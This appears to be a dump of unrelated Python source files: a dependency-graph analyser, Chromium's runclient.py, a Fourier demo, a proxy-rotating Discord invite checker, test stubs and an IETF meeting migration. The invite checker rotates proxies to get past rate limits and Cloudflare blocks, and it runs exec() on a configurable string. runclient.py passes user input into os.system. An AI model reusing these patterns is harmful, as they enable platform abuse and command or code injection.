Attributes.TOTAL_SIZE: DependencyGraph.Column('total size [B]', 0),
}
TOP_LEVEL_COLUMNS = {
Attributes.PROJECT: DependencyGraph.Column('project', ''),
Attributes.ABSOLUTE_PATH: DependencyGraph.Column('absolute path', None),
Attributes.BUILD_TIME: DependencyGraph.Column('build time [s]', 0.0),
Attributes.FILE_SIZE: DependencyGraph.Column('file size [B]', 0),
Attributes.TOTAL_SIZE: DependencyGraph.Column('total size [B]', 0),
}
INTERNAL_COLUMNS = {
Attributes.PROJECT: DependencyGraph.Column('project', ''),
Attributes.ABSOLUTE_PATH: DependencyGraph.Column('absolute path', None),
Attributes.TRANSLATION_UNITS: DependencyGraph.Column(
'number of dependent translation units', 0),
Attributes.FILE_SIZE: DependencyGraph.Column('file size [B]', 0),
Attributes.TOTAL_SIZE: DependencyGraph.Column('aggregated total size [B]', 0),
Attributes.BUILD_TIME: DependencyGraph.Column(
'total build time of dependants [s]', 0.0),
Attributes.AGG_BUILD_TIME_DEV: DependencyGraph.Column(
'aggregated build time deviation from avg [s]', 0.0),
}
def __init__(self, dependency_graph):
self._dependency_graph = dependency_graph
self._build_pch_dependencies()
def _build_pch_dependencies(self):
self._pch_dependencies = {}
for cpp_node in self._dependency_graph.get_top_level_nodes():
create_pch = self._dependency_graph.get_attribute(cpp_node, self.Attributes.CREATED_PCH)
if create_pch:
if create_pch in self._pch_dependencies:
raise RuntimeError('Duplicate precompiled header name: %s' %
create_pch)
self._pch_dependencies[create_pch] = frozenset(
self._dependency_graph.traverse_pre_order(create_pch, True))
def _is_pch_dependency(self, parent, child):
use_pch = self._dependency_graph.get_attribute(parent, self.Attributes.USED_PCH)
if use_pch:
return child in self._pch_dependencies[use_pch]
else:
return False
def _guess_dependency_project(self, label, directory_to_project):
if self._dependency_graph.has_attribute(label, self.Attributes.PROJECT):
return self._dependency_graph.get_attribute(label, self.Attributes.PROJECT)
directory = os.path.dirname(
self._dependency_graph.get_attribute(label, self.Attributes.ABSOLUTE_PATH))
while directory not in directory_to_project:
parent = os.path.dirname(directory)
if parent == directory:
return self.UNKNOWN_PROJECT_NAME
else:
directory = parent
return directory_to_project[directory]
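    # For example, a header under C:/src/libA/detail/ (hypothetical path) falls back to the
    # project registered for C:/src/libA or any closer known ancestor directory; if no
    # ancestor directory is known, UNKNOWN_PROJECT_NAME is returned.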
def get_project_dependency_graph(self):
"""
Builds a dependency graph showing relations between projects. This is
a networkx DiGraph, not a DependencyGraph.
"""
graph = nx.DiGraph()
for node in self._dependency_graph.traverse_pre_order():
dependencies = self._dependency_graph.get_node_immediate_dependencies(node)
source = self._dependency_graph.get_attribute(node, self.Attributes.PROJECT)
for dependency_node in dependencies:
target = self._dependency_graph.get_attribute(dependency_node,
self.Attributes.PROJECT)
if source != target:
graph.add_edge(source, target)
return graph
def calculate_file_sizes(self):
"""
Calculates file sizes of individual files by checking the disk
usage for files pointed to by Metrics.ABSOLUTE_PATH in the DependencyGraph.
"""
logging.info('Calculating file sizes...')
for label in self._dependency_graph.traverse_post_order():
path = self._dependency_graph.get_attribute(label,
self.Attributes.ABSOLUTE_PATH)
file_size = os.path.getsize(path)
self._dependency_graph.set_attribute(label, self.Attributes.FILE_SIZE,
file_size)
logging.debug('File size of %s is %s',
label, _pretty_filesize(file_size))
def calculate_total_sizes(self):
"""
Calculates "total" sizes of files. This is the file size of the node
plus the sizes of all its dependencies. For top level nodes (.cpp files)
we're calculating the total size in a straightforward manner. For internal
nodes we're getting the aggregated subtree total size by summing total
sizes when included from each of the top level nodes. This is done
because the subtree size may be significantly smaller if included from
a file using a precompiled header with one of the subtree nodes.
"""
logging.info('Calculating total sizes...')
for label in self._dependency_graph.traverse_pre_order(include_origin=True):
self._dependency_graph.remove_attribute(label, self.Attributes.TOTAL_SIZE)
top_level_total_size = 0
for top_level in self._dependency_graph.get_top_level_nodes():
subtree_sizes = defaultdict(lambda: 0)
subtree = self._dependency_graph.get_subtree(top_level)
for internal in subtree.traverse_post_order(top_level, True):
if not self._is_pch_dependency(top_level, internal):
subtree_size = self._dependency_graph.get_attribute(internal,
self.Attributes.FILE_SIZE)
for child in subtree.get_node_immediate_dependencies(internal):
subtree_size += subtree_sizes[child]
subtree_sizes[internal] += subtree_size
current = self._dependency_graph.get_attribute(internal,
self.Attributes.TOTAL_SIZE,
0)
self._dependency_graph.set_attribute(internal,
self.Attributes.TOTAL_SIZE,
current + subtree_size)
else:
subtree_sizes[internal] = 0
top_level_total_size += self._dependency_graph.get_attribute(top_level,
self.Attributes.TOTAL_SIZE)
self._dependency_graph.set_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.TOTAL_SIZE,
top_level_total_size)
def calculate_total_build_times(self):
"""
Calculates the "total build time" metric. The total build time for a
dependency node is the sum of build times of all its dependant top-level
nodes.
"""
logging.info('Calculating total build times...')
for label in self._dependency_graph.get_dependency_nodes():
self._dependency_graph.remove_attribute(label, self.Attributes.BUILD_TIME)
total_build_time = 0.0
for label in self._dependency_graph.get_top_level_nodes():
build_time = self._dependency_graph.get_attribute(
label,
self.Attributes.BUILD_TIME)
total_build_time += build_time
subtree = self._dependency_graph.traverse_pre_order(label)
for subtree_label in subtree:
if not self._is_pch_dependency(label, subtree_label):
current = self._dependency_graph.get_attribute(
subtree_label, self.Attributes.BUILD_TIME, default=0.0)
current += build_time
self._dependency_graph.set_attribute(
subtree_label,
self.Attributes.BUILD_TIME,
current)
self._dependency_graph.set_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.BUILD_TIME,
total_build_time)
def calculate_translation_units(self):
"""
Calculates the "translation units" metric. The metric value for
dependency nodes is the number of dependant top-level nodes.
"""
logging.info('Calculating translation units...')
for label in self._dependency_graph.traverse_post_order():
self._dependency_graph.remove_attribute(label, self.Attributes.TRANSLATION_UNITS)
total_translation_units = 0
for label in self._dependency_graph.get_top_level_nodes():
total_translation_units += 1
subtree = self._dependency_graph.traverse_pre_order(label)
for subtree_label in subtree:
if not self._is_pch_dependency(label, subtree_label):
current = self._dependency_graph.get_attribute(
subtree_label, self.Attributes.TRANSLATION_UNITS, default=0)
current += 1
self._dependency_graph.set_attribute(
subtree_label,
self.Attributes.TRANSLATION_UNITS,
current)
self._dependency_graph.set_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.TRANSLATION_UNITS,
total_translation_units)
def calculate_agg_build_time_dev(self):
"""
Calculates the "aggregated build time deviation" metric. This is the sum
of differences between the average build time and the build time of
all parents.
"""
logging.info('Calculating aggregated build time deviation...')
total_build_time = self._dependency_graph.get_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.BUILD_TIME)
total_tus = self._dependency_graph.get_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.TRANSLATION_UNITS)
avg_build_time = ((total_build_time / total_tus) if total_tus > 0 else 0)
for label in self._dependency_graph.traverse_pre_order():
tus = self._dependency_graph.get_attribute(label,
self.Attributes.TRANSLATION_UNITS)
if tus is not None:
total_build_time = self._dependency_graph.get_attribute(
label,
self.Attributes.BUILD_TIME)
avg_total_build_time = avg_build_time * tus
self._dependency_graph.set_attribute(label,
self.Attributes.AGG_BUILD_TIME_DEV,
total_build_time - avg_total_build_time)
def guess_project_names(self):
"""
Sets the project name attribute for all nodes, based on the directory the file
lies in.
"""
logging.info('Guessing project names for headers...')
directory_to_project = {}
for cpp_node in self._dependency_graph.get_top_level_nodes():
directory = os.path.dirname(
self._dependency_graph.get_attribute(cpp_node, self.Attributes.ABSOLUTE_PATH))
project = self._dependency_graph.get_attribute(cpp_node, self.Attributes.PROJECT)
if directory in directory_to_project:
if directory_to_project[directory] != project:
logging.error('cpp file %s from project %s in directory %s '
'inconsistent with the currently stored '
'project: %s', cpp_node, project, directory,
                                  directory_to_project[directory])
else:
directory_to_project[directory] = project
for node in self._dependency_graph.traverse_pre_order():
self._dependency_graph.set_attribute(node, self.Attributes.PROJECT,
self._guess_dependency_project(
node, directory_to_project))
def run_full_analysis(self):
"""Calculates all available metrics for the graph."""
self.calculate_file_sizes()
self.calculate_total_sizes()
self.calculate_total_build_times()
self.calculate_translation_units()
self.calculate_agg_build_time_dev()
self.guess_project_names()
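# Illustrative usage sketch (constructing the DependencyGraph is assumed to happen elsewhere):
#   analyser = Analyser(dependency_graph)
#   analyser.run_full_analysis()
#   project_graph = analyser.get_project_dependency_graph()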
| python |
#!/usr/bin/env python
#
# Copyright (c) 2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# runclient.py gets the chromoting host info from an input arg and then
# tries to find the authentication info in the .chromotingAuthToken file
# so that the host authentication arguments can be automatically set.
import os
import platform
auth_filepath = os.path.join(os.path.expanduser('~'), '.chromotingAuthToken')
script_path = os.path.dirname(__file__)
if platform.system() == "Windows":
# TODO(garykac): Make this work on Windows.
print 'Not yet supported on Windows.'
exit(1)
elif platform.system() == "Darwin": # Darwin == MacOSX
client_path = '../../xcodebuild/Debug/chromoting_simple_client'
else:
client_path = '../../out/Debug/chromoting_x11_client'
client_path = os.path.join(script_path, client_path)
# Read username and auth token from token file.
auth = open(auth_filepath)
authinfo = auth.readlines()
username = authinfo[0].rstrip()
authtoken = authinfo[1].rstrip()
# Request final 8 characters of Host JID from user.
# This assumes that the host is published under the same username as the
# client attempting to connect.
print 'Host JID:', username + '/chromoting',
hostjid_suffix = raw_input()
hostjid = username + '/chromoting' + hostjid_suffix.upper()
command = []
command.append(client_path)
command.append('--host_jid ' + hostjid)
command.append('--jid ' + username)
command.append('--token ' + authtoken)
# Launch the client
os.system(' '.join(command))
| python |
import numpy as np
import scipy.integrate as spi
import matplotlib.pyplot as plt
#t is the independent variable
P = 3. #period value
BT=-6. #initian value of t (time begin)
ET=6. #final value of t (time end)
FS=1000 #number of discrete values of t between BT and ET
#the periodic real-valued function f(t) with period equal to P to simulate an acquired dataset
f = lambda t: ((t % P) - (P / 2.)) ** 3
t_range = np.linspace(BT, ET, FS) #all discrete values of t in the interval from BT and ET
y_true = f(t_range) #the true f(t)
#function that computes the complex fourier coefficients c-N,.., c0, .., cN
def compute_complex_fourier_coeffs_from_discrete_set(y_dataset, N): #via Riemann sum; N is up to nthHarmonic
result = []
T = len(y_dataset)
t = np.arange(T)
for n in range(-N, N+1):
cn = (1./T) * (y_dataset * np.exp(-1j * 2 * np.pi * n * t / T)).sum()
result.append(cn)
return np.array(result)
#function that computes the complex form Fourier series using cn coefficients
def fit_func_by_fourier_series_with_complex_coeffs(t, C):
result = 0. + 0.j
L = int((len(C) - 1) / 2)
for n in range(-L, L+1):
c = C[n+L]
result += c * np.exp(1j * 2. * np.pi * n * t / P)
return result
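# The two functions above implement the discrete approximation of the complex Fourier series:
#   c_n ~ (1/T) * sum_{t=0..T-1} y_t * exp(-1j * 2*pi*n*t / T)   (Riemann sum over one period)
#   f(t) ~ sum_{n=-N..N} c_n * exp(1j * 2*pi*n*t / P)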
FDS=20. #number of discrete values of the dataset (that is long as a period)
t_period = np.arange(0, P, 1/FDS)
y_dataset = f(t_period) #generation of discrete dataset
maxN=8
COLs = 2 #cols of plt
ROWs = 1 + (maxN-1) // COLs #rows of plt
plt.rcParams['font.size'] = 8
fig, axs = plt.subplots(ROWs, COLs)
fig.tight_layout(rect=[0, 0, 1, 0.95], pad=3.0)
fig.suptitle('simulated dataset with period P=' + str(P))
#plot, in the range from BT to ET, the true f(t) in blue and the approximation in red
for N in range(1, maxN + 1):
C = compute_complex_fourier_coeffs_from_discrete_set(y_dataset, N)
#C contains the list of cn complex coefficients for n in 1..N interval.
y_approx = fit_func_by_fourier_series_with_complex_coeffs(t_range, C) #y_approx contains the discrete values of approximation obtained by the Fourier series
row = (N-1) // COLs
col = (N-1) % COLs
axs[row, col].set_title('case N=' + str(N))
axs[row, col].scatter(t_range, y_true, color='blue', s=1, marker='.')
axs[row, col].scatter(t_range, y_approx, color='red', s=2, marker='.')
plt.show()
| python |
#first, we import the required libraries
import threading, os, time, requests, yaml
from tkinter.filedialog import askopenfilename
from tkinter import Tk
from concurrent.futures import ThreadPoolExecutor
from console.utils import set_title
from timeit import default_timer as timer
from datetime import timedelta, datetime
from colored import fg
#if results folder doesnt exist, make one
if not os.path.exists("Results"):
os.mkdir("Results")
class vars: #we store basically every variable in this class called vars
threads = None
timeout = None
proxies = []
remaining = []
current_proxy = 0
combos = []
errors = 0
valid = 0
invalid = 0
blocked = 0
total = 0
checked = 0
cpm = 0
proxy_type = 'http'
combos_name = ''
min_members = None
max_verification = None
starttime = None
capture_message = None
color_scheme = None
refresh_delay = None
#if settings file doesnt exist, make one with default settings
if not os.path.exists("settings.yaml"):
with open("settings.yaml", "w") as f:
f.write('Threads: 200\nTimeout: 6 #seconds\nMinimum Members: 500\nMaximum Verification Level: 4\nColor Scheme Hex: 0236c7\nUI Refresh Delay: 1 #seconds\n'+r'Capture Message: "------------------------------------\n > Code: {code}\n > Server Name: {server_name}\n > Members: {member_count}\n > Verification Level: {verification_level}\n" #placeholders: code, server_name, server_description, server_id, member_count, verification_level, boosters | newline = \n | use placeholders like this: "placeholder: {put placeholder here}"')
with open("settings.yaml", "r") as f: #load settings from the settings file and store them inside the vars class
settings = yaml.safe_load(f)
vars.threads = settings['Threads']
vars.timeout = settings['Timeout']
vars.min_members = settings['Minimum Members']
vars.max_verification = settings['Maximum Verification Level']
vars.capture_message = settings['Capture Message']
try:
vars.color_scheme = fg(f"#{settings['Color Scheme Hex']}")
except:
vars.color_scheme = fg("#0236c7")
try:
vars.refresh_delay = int(settings['UI Refresh Delay'])
except:
try:
vars.refresh_delay = float(settings['UI Refresh Delay'])
except:
vars.refresh_delay = 1
class main: #this class is basically the brain of the program
def __init__(self):
self.start()
def clear(self):
os.system('cls') #simply clears console (calling this function requires 12 characters while calling the os command
# for clearing console requires 16, i think by saving those 4 characters we achieve a lot)
def logo(self):
self.clear()
print(f'''{vars.color_scheme} Favel\u001b[0m\n''') #i was too lazy to copy and paste something from an art gen
def check(self, keyword): #the keyword argument is the discord invite code
try:
proxy = vars.proxies[vars.current_proxy]
except:
vars.current_proxy = 0
proxy = vars.proxies[vars.current_proxy]
while 1: #repeat the process until we either get valid or invalid
while 1: #repeat until we get reply
try:
a = requests.get(f'https://discord.com/api/v9/invites/{keyword}?with_counts=true', proxies={'http': f"{vars.proxy_type}://{proxy}", 'https': f"{vars.proxy_type}://{proxy}"}, timeout=vars.timeout, headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36', 'pragma': 'no-cache', 'accept': '*/*'}) #sends the check request to the discord api
break
except: #if request fails
vars.current_proxy += 1
vars.errors += 1
try:
proxy = vars.proxies[vars.current_proxy]
except:
vars.current_proxy = 0
proxy = vars.proxies[vars.current_proxy]
if '"message": "Unknown Invite"' in a.text: #if account is invalid
vars.invalid += 1
break
elif "guild" in a.text and int(a.json()['approximate_member_count']) >= vars.min_members and int(a.json()['guild']['verification_level']) <= vars.max_verification: #if account is valid and meets the criteria
code = keyword
server_name = a.json()['guild']['name']
server_description = a.json()['guild']['description']
server_id = a.json()['guild']['id']
member_count = a.json()['approximate_member_count']
verification_level = a.json()['guild']['verification_level']
boosters = a.json()['guild']['premium_subscription_count']
vars.valid += 1
with open(f'Results\\{vars.starttime}\\capture.txt', "a", errors="replace") as f:
try:
exec(f'f.write(f{repr(vars.capture_message)})') #writes the capture message to the capture output file
except Exception as e:
with open("capture_error.log", "w") as f:
f.write(f"{e}\n\nCapture message: {repr(vars.capture_message)}")
with open(f"Results\\{vars.starttime}\\valid.txt", "a", errors="replace") as f:
f.write(f"{keyword}\n")
break
elif "Access denied | " in a.text or " Cloudflare" in a.text: #if request has been blocked by cloudflare
vars.blocked += 1
#we dont set quit to true because we want the checker to check the code again
vars.checked += 1 #adds +1 to checked variable so we can count remaining for ui
threading.Thread(target=self.cpm,).start() #adds +1 cpm (i know its bad to use threads for counting cpm, ill write a better counter if i have time)
vars.remaining.remove(keyword) #removes code from remaining list so we dont check it again
def cpm(self):
vars.cpm += 1 #adds one to cpm variable
time.sleep(60)#waits 60 seconds
vars.cpm -= 1 #removes the added cpm
def start(self):
self.logo()
Tk().withdraw() #we create a tkinter ui and instantly hide it, this is needed for the file loading
print(' Loading Proxies...')
loaded = False
while not loaded: #loop until user selects file
time.sleep(0.5)
try:
with open(askopenfilename(), 'r', errors='replace') as f:
lines = f.readlines()
for item in lines:
vars.proxies.append(item.strip())
loaded = True
except:
time.sleep(1)
self.logo()
print(f''' Proxy type:
{vars.color_scheme}<\u001b[0m1{vars.color_scheme}>\u001b[0m HTTP
{vars.color_scheme}<\u001b[0m2{vars.color_scheme}>\u001b[0m SOCKS4
{vars.color_scheme}<\u001b[0m3{vars.color_scheme}>\u001b[0m SOCKS5\n''')
ptype = input(f' {vars.color_scheme}<\u001b[0mQ{vars.color_scheme}>\u001b[0m ')
if "1" in ptype:
vars.proxy_type = "http"
elif "2" in ptype:
vars.proxy_type = "socks4"
elif "3" in ptype:
vars.proxy_type = "socks5"
temp_proxies = []
if '@' in vars.proxies[0]: #if proxies are auth proxies
for item in vars.proxies:
temp_proxies.append(item.split('@')[1]+"@"+item.split('@')[0]) #reverses auth proxy format, because for whatever reason the requests library requires it to be backwards
vars.proxies = temp_proxies
print('\nAuth proxy format: '+str(temp_proxies[0]))
print('Make sure it matches this: user:pass@ip:port')
input()
loaded = False
self.logo()
print(' Loading Keywords...')
while not loaded:
time.sleep(0.5)
vars.combos_name = askopenfilename()
try:
with open(vars.combos_name, 'r', errors='replace') as f:
lines = f.readlines()
for item in lines:
vars.combos.append(item.strip())
loaded = True
except:
time.sleep(1)
vars.starttime = datetime.today().strftime("%d-%m-%Y %H-%M-%S")
if not os.path.exists(f"Results\\{vars.starttime}"):
os.mkdir(f"Results\\{vars.starttime}")
vars.total = len(vars.combos)
vars.remaining = vars.combos
with ThreadPoolExecutor(max_workers=vars.threads) as exe:
self.clear()
print("Starting threads...")
for item in vars.combos:
if item.strip() != "": #if line is not empty
exe.submit(self.check, item) #submits the thread to the threadpool
vars.current_proxy += 1
threading.Thread(target=self.screen,).start() #after the threads have been added to the threadpool, we display the ui
#the reason why we dont display the ui before adding the threads to the threadpool is because
#it would be incredibly laggy, and would make adding threads even slower
def screen(self):
greenicon = '\u001b[32m[\u001b[0m~\u001b[32m]\u001b[0m'
yellowicon = '\u001b[33m[\u001b[0m~\u001b[33m]\u001b[0m'
redicon = '\u001b[31m[\u001b[0m~\u001b[31m]\u001b[0m'
blueicon = f'{vars.color_scheme}[\u001b[0m~{vars.color_scheme}]\u001b[0m'
start = timer()
while 1:
self.logo()
print('')
print(f' {greenicon} Valid ( {vars.valid} )')
print(f' {yellowicon} Invalid ( {vars.invalid} )')
print(f'\n {redicon} Errors ( {vars.errors} )')
print(f' {redicon} Blocked ( {vars.blocked} )')
print(f'\n {blueicon} CPM ( {vars.cpm} )')
print(f' {blueicon} Remaining ( {vars.total-vars.checked} )')
set_title(f'Favel Invite Checker | CPM: {vars.cpm} | {str(timedelta(seconds=timer()-start)).split(".")[0]} | Nandi') #its not cool to replace my name with yours
time.sleep(vars.refresh_delay)
os.system('cls')
if __name__ == '__main__':
main() | python |
# This is a dummy test file; delete it once the package actually has tests.
def test_import():
import qutip_tensornetwork
assert qutip_tensornetwork.__version__
| python |
import abc
from smqtk.utils.plugin import Pluggable
class DummyInterface (Pluggable):
@abc.abstractmethod
def inst_method(self, val):
""" test abstract method. """
| python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.db import migrations
def backfill_91_other_meetings(apps, schema_editor):
Meeting = apps.get_model('meeting', 'Meeting')
Schedule = apps.get_model('meeting', 'Schedule')
ScheduledSession = apps.get_model('meeting', 'ScheduledSession')
Room = apps.get_model('meeting', 'Room')
Group = apps.get_model('group', 'Group')
Person = apps.get_model('person', 'Person')
ietf91 = Meeting.objects.filter(number=91).first()
if not ietf91:
print "IETF91 not found, no data changed"
else:
agenda91 = Schedule.objects.get(meeting=ietf91,pk=ietf91.agenda.pk)
south_pacific_1 = Room.objects.get(meeting=ietf91,name="South Pacific 1")
south_pacific_2 = Room.objects.get(meeting=ietf91,name="South Pacific 2")
rainbow_12 = Room.objects.get(meeting=ietf91,name="Rainbow Suite 1/2")
lehua_suite = Room.objects.get(meeting=ietf91,name="Lehua Suite")
kahili = Room.objects.get(meeting=ietf91,name="Kahili")
coral_2 = Room.objects.get(meeting=ietf91,name="Coral 2")
south_pacific_3 = Room.objects.create(meeting=ietf91,name="South Pacific 3",capacity=20)
rainbow_suite_3 = Room.objects.create(meeting=ietf91,name="Rainbow Suite 3",capacity=20)
rainbow_23 = Room.objects.create(meeting=ietf91,name="Rainbow Suite 2/3",capacity=210)
south_pacific_34 = Room.objects.create(meeting=ietf91,name="South Pacific 3/4",capacity=210)
iolani_67 = Room.objects.create(meeting=ietf91,name="Iolani 6/7",capacity=40)
sea_pearl_12 = Room.objects.create(meeting=ietf91,name="Sea Pearl 1/2",capacity=40)
sea_pearl_2 = Room.objects.create(meeting=ietf91,name="Sea Pearl 2",capacity=20)
coral_lounge = Room.objects.create(meeting=ietf91,name="Coral Lounge", capacity=1200)
hibiscus = Room.objects.create(meeting=ietf91,name="Hibiscus", capacity=20)
tiare = Room.objects.create(meeting=ietf91,name="Tiare Suite", capacity=20)
iesg = Group.objects.get(acronym='iesg')
iab = Group.objects.get(acronym='iab')
rsoc = Group.objects.get(acronym='rsoc')
iaoc = Group.objects.get(acronym='iaoc')
nomcom = Group.objects.get(acronym='nomcom2014')
isoc = Group.objects.get(acronym='isoc')
secr = Group.objects.get(acronym='secretariat')
isocbot = Group.objects.create(acronym='isocbot',name="Internet Society Board of Trustees",state_id='active',type_id='isoc',parent=isoc)
isocfell = Group.objects.create(acronym='isocfell',name="Internet Society Fellows",state_id='active',type_id='isoc',parent=isoc)
system = Person.objects.get(name='(System)')
for d, h, m, duration, type_id, groups, room, slotname, label in [
( 9, 8, 0, 120, 'offagenda', [secr], rainbow_suite_3, 'WEIRDS Interop', 'WEIRDS Interop'),
( 9, 8, 30, 90, 'lead', [iesg], south_pacific_2, 'Breakfast', None),
( 9, 9, 0, 240, 'offagenda', [secr], lehua_suite, 'RMCAT Interim', 'RMCAT Interim Meeting'),
( 9, 9, 0, 60, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 9, 9, 0, 150, 'lead', [iesg], south_pacific_2, 'Meeting', None),
( 9, 9, 0, 360, 'offagenda', [secr], hibiscus, 'Meeting', 'RootOPS'),
( 9, 9, 30, 360, 'offagenda', [secr], kahili, 'TLS Interim', 'TLS WG Interim'),
( 9, 11, 0, 480, 'offagenda', [secr], coral_lounge, 'T-Shirt Distribution', 'T-shirt Distribution'),
( 9, 11, 30, 150, 'lead', [iesg], south_pacific_2, 'Lunch', 'IESG Lunch with the IAB'),
( 9, 11, 30, 150, 'lead', [iab], south_pacific_2, 'Lunch', 'IAB Lunch with the IESG'),
( 9, 12, 0, 360, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 9, 14, 0, 180, 'lead', [iab], south_pacific_2, 'Meeting', None),
( 9, 16, 0, 120, 'offagenda', [secr], coral_2, 'Meeting', 'Web Object Encryption'),
( 9, 17, 0, 120, 'offagenda', [secr], sea_pearl_12, 'Reception', "Companion's Reception"), # Should this appear on agenda?
( 9, 19, 0, 180, 'offagenda', [isocfell], rainbow_23, 'Dinner', 'ISOC Fellows Reception/Dinner'),
( 9, 19, 0, 180, 'offagenda', [secr], lehua_suite, 'Meeting', 'Huawei'),
( 9, 21, 0, 180, 'lead', [secr], sea_pearl_12, 'Gathering', 'AMS/IESG/IAB/IAOC Gathering'),
( 10, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 10, 7, 0, 120, 'lead', [iesg], south_pacific_2, 'Breakfast', 'IESG Breakfast with the IAB'),
( 10, 7, 0, 120, 'lead', [iab], south_pacific_2, 'Breakfast', 'IAB Breakfast with the IESG'),
( 10, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 10, 8, 0, 600, 'offagenda', [secr], coral_lounge, 'T-shirt Distribution', 'T-shirt Distribution'),
( 10, 11, 30, 90, 'offagenda', [secr], south_pacific_2, 'Meeting', 'OPS Directorate Meeting'),
( 10, 11, 30, 90, 'offagenda', [secr], rainbow_suite_3, 'Meeting', 'IETF/3GPP Meeting'),
( 10, 11, 30, 90, 'offagenda', [secr], lehua_suite, 'Meeting', 'RTG Area Meeting'),
( 10, 19, 0, 240, 'offagenda', [secr], south_pacific_2, 'Meeting', 'Huawei'),
( 11, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 11, 7, 0, 120, 'lead', [iesg], south_pacific_2, 'Breakfast', None),
( 11, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 11, 7, 0, 120, 'lead', [iab], rainbow_suite_3, 'Breakfast', None),
( 11, 7, 0, 60, 'lead', [iab], tiare, 'Meeting', 'Vendor Selection Committee Meeting'),
( 11, 8, 0, 600, 'offagenda', [secr], coral_lounge, 'T-shirt Distribution', 'T-shirt Distribution'),
( 11, 9, 0, 90, 'offagenda', [secr], south_pacific_2, 'Meeting', 'DHCPv6bis Team Meeting'),
( 11, 11, 30, 90, 'offagenda', [secr], south_pacific_2, 'Meeting', 'SECdir Meeting'),
( 11, 11, 30, 90, 'offagenda', [secr], rainbow_suite_3, 'Lunch', 'RSAG/ISEB Lunch'),
( 11, 16, 0, 240, 'offagenda', [secr], south_pacific_2, 'Meeting', 'Verisign Corporate Meeting'),
( 12, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 12, 7, 30, 90, 'lead', [iaoc], south_pacific_3, 'Breakfast', None),
( 12, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 12, 8, 0, 540, 'offagenda', [secr], coral_lounge, 'T-shirt Distribution', 'T-shirt Distribution'),
( 12, 8, 0, 240, 'offagenda', [secr], south_pacific_2, 'Meeting', 'DIME WG'),
( 12, 11, 30, 90, 'offagenda', [secr], rainbow_suite_3, 'Lunch', 'RFC Editor Lunch'),
( 12, 15, 0, 120, 'offagenda', [secr], south_pacific_2, 'Meeting', 'YANG Advice'),
( 12, 17, 0, 240, 'offagenda', [secr], rainbow_suite_3, 'Meeting', 'Huawei (POC Wil Liu)'),
( 12, 20, 0, 150, 'offagenda', [secr], south_pacific_2, 'Meeting', 'ICANN SSAC'),
( 13, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 13, 7, 0, 120, 'lead', [iab], rainbow_suite_3, 'Breakfast', None),
( 13, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 13, 11, 30, 90, 'lead', [iab], sea_pearl_2, 'Meeting', 'IAB Liaison Oversight'),
( 13, 11, 30, 90, 'lead', [rsoc], rainbow_suite_3, 'Lunch', None),
( 14, 0, 0, 900, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 14, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 14, 11, 0, 360, 'offagenda', [isoc], south_pacific_34,'Meeeting', 'ISOC AC Meeting'),
( 14, 13, 30, 90, 'lead', [iesg], south_pacific_2, 'Lunch', 'IESG Lunch with the IAB'),
( 14, 13, 30, 90, 'lead', [iab], south_pacific_2, 'Lunch', 'IAB Lunch with the IESG'),
( 14, 18, 0, 60, 'offagenda', [isocbot], rainbow_23, 'Reception', 'ISOC Board Reception for IETF Leadership'),
( 14, 19, 0, 180, 'offagenda', [isocbot], rainbow_23, 'Dinner', 'ISOC Board Dinner for IETF Leadership'),
( 15, 8, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Breakfast', 'ISOC Board of Trustees Breakfast'),
( 15, 8, 0, 540, 'offagenda', [isocbot], south_pacific_34,'Meeting', 'ISOC Board of Trustees Meeting'),
( 15, 12, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Lunch', 'ISOC Board of Trustees Lunch'),
( 16, 8, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Breakfast', 'ISOC Board of Trustees Breakfast'),
( 16, 8, 0, 540, 'offagenda', [isocbot], south_pacific_34,'Meeting', 'ISOC Board of Trustees Meeting'),
( 16, 12, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Lunch', 'ISOC Board of Trustees Lunch'),
]:
ts = ietf91.timeslot_set.create(type_id=type_id, name=slotname,
time=datetime.datetime(2014,11,d,h,m,0),
duration=datetime.timedelta(minutes=duration),
location=room,show_location=(type_id not in ['lead','offagenda']))
for group in groups:
session = ietf91.session_set.create(name= label or "%s %s"%(group.acronym.upper(),slotname),
group=group, attendees=25,
requested=datetime.datetime(2014,11,1,0,0,0),
requested_by=system, status_id='sched')
ScheduledSession.objects.create(schedule=agenda91, timeslot=ts, session=session)
class Migration(migrations.Migration):
dependencies = [
('meeting', '0005_auto_20150430_0847'),
('name', '0004_auto_20150318_1140'),
('group', '0004_auto_20150430_0847'),
('person', '0004_auto_20150308_0440'),
]
operations = [
migrations.RunPython(backfill_91_other_meetings)
]
| python |
import csv
import os
import time
import pytest
from conftest import params
from pygraphblas import *
from src.RegularPathQuering import rpq
@pytest.mark.parametrize('impl,graph,regex', params)
def test_benchmark_rpq(impl, graph, regex):
